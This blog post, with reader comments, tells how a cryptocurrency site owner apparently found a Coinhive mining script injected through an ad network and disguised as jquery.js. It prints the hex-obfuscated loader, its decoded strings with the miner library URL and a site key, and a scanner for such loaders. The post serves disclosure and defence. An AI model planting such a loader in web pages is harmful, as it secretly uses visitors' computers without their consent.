Ad Networks Could be Using Your Computer to Mine Cryptocurrencies Right Now

in #bitcoin · 6 years ago (edited)



One of the side projects I run is a website about cryptocurrencies. I focus mainly on profiling the most prominent coins and offering objective information. It’s mostly a hobby, but I opted for monetizing it using niche ads so it can pay for itself.

A well-known crypto ad network contacted me and offered me a decent deal. It was all going well until a few weeks ago, when I installed a browser extension called minerBlock just out of curiosity and was surprised to learn that my own website was running a Coinhive script in the background.


I did notice a while back that my CPU usage would spike when I had my website open. I thought it was due to the several tabs I had running simultaneously and never made the connection to a possible mining script.

My website doesn’t run any external scripts except for the one that loaded the ads on my homepage.

Yet, I was infected with a sneaky Coinhive injection that disguised itself as a jquery.js file.

Here's the relevant code if anyone is interested:

var _0x7a2c = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65", "\x6F\x6E\x6C\x6F\x61\x64", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x68\x65\x61\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x63\x6F\x6D\x2F\x6C\x69\x62\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x6D\x69\x6E\x2E\x6A\x73", "\x4B\x34\x4B\x35\x5A\x78\x63\x54\x33\x42\x6A\x62\x78\x44\x43\x42\x42\x56\x6A\x39\x37\x32\x47\x62\x51\x57\x76\x32\x6B\x55\x4E\x55", "\x73\x74\x61\x72\x74"];

function loadScript(_0xca68x2, _0xca68x3) {
    var _0xca68x4 = document[_0x7a2c[1]](_0x7a2c[0]);
    _0xca68x4[_0x7a2c[2]] = _0x7a2c[3];
    _0xca68x4[_0x7a2c[4]] = _0xca68x2;
    _0xca68x4[_0x7a2c[5]] = _0xca68x3;
    _0xca68x4[_0x7a2c[6]] = _0xca68x3;
    document[_0x7a2c[8]][_0x7a2c[7]](_0xca68x4)
}
loadScript(_0x7a2c[9], function() {
    var _0xca68x5 = new CoinHive.Anonymous(_0x7a2c[10], {
        threads: 4
    });
    _0xca68x5[_0x7a2c[11]]()
});


If you decode var _0x7a2c using a service like Hexdecoder, you'll get this:

var _0x7a2c = ["script", "createElement", "type", "text/javascript", "src", "onreadystatechange", "onload", "appendChild", "head", "https://coinhive.com/lib/coinhive.min.js", "K4K5ZxcT3BjbxDCBBVj972GbQWv2kUNU", "start"];
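The loader above hides its strings behind "\xNN" escapes, so a plain text search of the served file for the Coinhive library URL finds nothing, even though the CoinHive.Anonymous call itself is in the clear. The following scanner is an added example (not code from the original post or from minerBlock): it undoes the escapes and then checks for the two indicators taken from the decoded array. The samples, the site-key placeholder and the function names are all constructed for this example.

```javascript
// Indicators from the decoded array in the post: the miner library URL the
// loader fetches and the constructor it calls once the library is in place.
const MINER_INDICATORS = [
  "coinhive.com/lib/coinhive.min.js",
  "CoinHive.Anonymous",
];

// Undo "\xNN" and "\uNNNN" string escapes, so that
// "\x73\x63\x72\x69\x70\x74" reads as "script" again.
function decodeEscapes(source) {
  const fromHex = (_, hex) => String.fromCharCode(parseInt(hex, 16));
  return source
    .replace(/\\x([0-9a-fA-F]{2})/g, fromHex)
    .replace(/\\u([0-9a-fA-F]{4})/g, fromHex);
}

// Scan one script body. "found" lists the indicators present after decoding;
// "hidden" lists those that a plain text search on the raw file would miss.
function scanForMiner(source) {
  const decoded = decodeEscapes(source);
  const found = MINER_INDICATORS.filter((ioc) => decoded.includes(ioc));
  const hidden = found.filter((ioc) => !source.includes(ioc));
  return { suspicious: found.length > 0, found, hidden };
}

// Constructed sample: a shortened copy of the loader quoted in the post, with
// the site key replaced by a placeholder. String.raw keeps the backslashes so
// the escapes stay obfuscated exactly as they would be in the served file.
const SAMPLE_LOADER = String.raw`
var _0x7a2c = ["\x73\x63\x72\x69\x70\x74", "\x73\x72\x63",
  "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x63\x6F\x6D\x2F\x6C\x69\x62\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x6D\x69\x6E\x2E\x6A\x73",
  "\x73\x74\x61\x72\x74"];
loadScript(_0x7a2c[2], function() {
  var miner = new CoinHive.Anonymous("<site-key-placeholder>", { threads: 4 });
  miner[_0x7a2c[3]]();
});`;

// Constructed benign sample: an ordinary script loader that should pass.
const SAMPLE_BENIGN = String.raw`
var s = document.createElement("script");
s.src = "https://example.com/jquery.min.js";
document.head.appendChild(s);`;

// Run stand-alone: prints one line per sample.
for (const [name, src] of [["loader", SAMPLE_LOADER], ["benign", SAMPLE_BENIGN]]) {
  const result = scanForMiner(src);
  console.log(name, result.suspicious ? "SUSPICIOUS" : "clean", result.found, result.hidden);
}
```

Point the scanner at every script your page serves, including anything an ad tag pulls in, and treat a hit in "hidden" as the strongest signal, since that string was deliberately kept out of sight.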


If you don't know what Coinhive is, here's a good write up by @fiserman.

To be clear, I have nothing against Coinhive. However, I do have a problem if you're using it to mine cryptocurrencies on random people's computers without their consent.

I won’t disclose the ad network because I can’t effectively prove they did it. The sneaky bastards.

Nonetheless, if you run a website, or even if you often visit sites that carry ads, I encourage you to use a browser extension like the one I mentioned.

Be safe,

@sek3


Hi, how are you doing? I post regularly on subjects related to cryptocurrency and new tech. If you like my stuff and want to get it fresh off the keyboard, follow me @sek.





I have heard about people installing malicious scripts/viruses in ads that they then pay an ad network to (while unaware of the script or virus in the file) publish on people's websites. If they can do it with viruses then they could probably do it with a coin miner script, so I guess there's always a small chance that the ad network didn't (knowingly) back stab you.

It could be like you described. It could even be someone from the network that did it without the organization's consent. I tried to audit the code, but it's a never-ending cascade of scripts linked to scripts that are linked to scripts...
I guess I'll never really know.

Monero's price jump has really ruined a lot of things. There were some serious WordPress hacks that got publicized last month where people were stealing a ridiculous amount of hash rate. The whole CoinHive thing and these sorts of injections REALLY bug me because I work on laptops most of the time and am not a fan of my battery life disappearing.

It's crazy. They don't even try to make it subtle it seems. I'd open my task manager and the CPU usage would be all over the place. It took me a good half day to find and get rid of it.

WOW, we have to be super careful nowadays!